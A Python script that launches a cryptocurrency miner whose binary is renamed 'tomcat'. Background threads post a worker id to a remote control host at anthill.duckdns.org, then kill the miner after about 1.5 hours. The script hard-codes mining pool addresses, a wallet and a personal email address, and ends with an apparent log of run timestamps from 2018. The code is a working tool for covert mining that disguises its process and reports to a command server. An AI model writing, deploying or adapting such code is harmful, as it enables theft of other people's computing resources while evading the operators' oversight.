import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:04.696472
#2018-02-17 17:04:03.683292
#2018-02-17 18:51:08.329912
#2018-02-17 20:40:08.147547
#2018-02-17 22:27:06.683682
#2018-02-18 00:10:07.395224
#2018-02-18 02:02:04.453365
#2018-02-18 03:49:01.400128
#2018-02-18 05:37:03.805810
#2018-02-18 07:30:05.785721
#2018-02-18 09:18:05.488287
#2018-02-18 11:04:02.184233
#2018-02-18 12:51:05.807708
#2018-02-18 14:39:02.053033
#2018-02-18 16:28:06.354744
#2018-02-18 18:17:07.119297
#2018-02-18 20:02:01.782944
#2018-02-18 21:49:06.755783
#2018-02-18 23:39:06.307648
#2018-02-19 01:25:08.359958
#2018-02-19 03:13:04.001478
#2018-02-19 04:58:02.086940
#2018-02-19 06:44:07.512586
#2018-02-19 08:34:05.275897
#2018-02-19 10:23:05.337081
#2018-02-19 12:11:08.071918
#2018-02-19 13:58:05.449052
#2018-02-19 15:47:07.523163
#2018-02-19 17:34:08.181920
#2018-02-19 19:21:01.236171
#2018-02-19 21:08:01.228900
#2018-02-19 22:54:05.281352
#2018-02-20 00:37:03.987004
#2018-02-20 02:26:07.585289
#2018-02-20 04:16:04.065388
#2018-02-20 05:59:04.000982
#2018-02-20 07:45:06.875333
#2018-02-20 09:31:07.222048
#2018-02-20 11:13:08.539806
#2018-02-20 13:01:09.129988
#2018-02-20 14:45:07.949665
#2018-02-20 16:32:05.731546
#2018-02-20 18:19:02.083980
#2018-02-20 20:09:04.270227
#2018-02-20 21:55:01.611870
#2018-02-20 23:37:01.249174
#2018-02-21 01:22:06.255749
#2018-02-21 03:11:01.797568
#2018-02-21 04:58:01.906758
#2018-02-21 06:46:05.282031
#2018-02-21 08:33:06.468194
#2018-02-21 10:18:07.757531
#2018-02-21 12:07:07.887488
#2018-02-21 13:55:09.897110
#2018-02-21 15:39:08.070716
#2018-02-21 17:29:11.315138
#2018-02-21 19:17:11.752649
#2018-02-21 21:06:06.845495
#2018-02-21 22:54:04.766632
#2018-02-22 00:42:10.018471
#2018-02-22 02:31:01.653406
#2018-02-22 04:17:01.704655
#2018-02-22 06:02:07.700322
#2018-02-22 07:48:04.238259
#2018-02-22 09:37:06.189020
#2018-02-22 11:23:01.818258
#2018-02-22 13:09:09.255470
#2018-02-22 14:58:01.970980
#2018-02-22 16:43:01.696398
#2018-02-22 18:28:07.218231
#2018-02-22 20:21:01.548184
#2018-02-22 22:06:01.976593
#2018-02-22 23:51:08.666362
#2018-02-23 01:39:06.857100
#2018-02-23 03:25:07.925801
#2018-02-23 05:11:01.266734
#2018-02-23 06:56:03.772149
#2018-02-23 08:45:01.533970
#2018-02-23 11:03:05.864037
#2018-02-23 12:57:08.858333
#2018-02-23 14:43:09.064421
#2018-02-23 16:33:01.222633
#2018-02-23 18:19:06.529955
#2018-02-23 20:03:07.554166
#2018-02-23 21:46:08.074851
#2018-02-23 23:39:06.804476
#2018-02-24 01:27:07.576989
#2018-02-24 03:18:06.585919
#2018-02-24 05:03:01.450844
#2018-02-24 06:51:01.716031
#2018-02-24 08:37:06.832342
#2018-02-24 10:22:01.577851
#2018-02-24 12:17:01.891584
#2018-02-24 14:10:08.688094
#2018-02-24 15:57:05.937789
#2018-02-24 17:51:01.795595
#2018-02-24 19:38:04.345627
#2018-02-24 21:25:04.678570
#2018-02-25 00:07:05.305149
#2018-02-25 04:04:01.239133
#2018-02-25 07:36:05.373440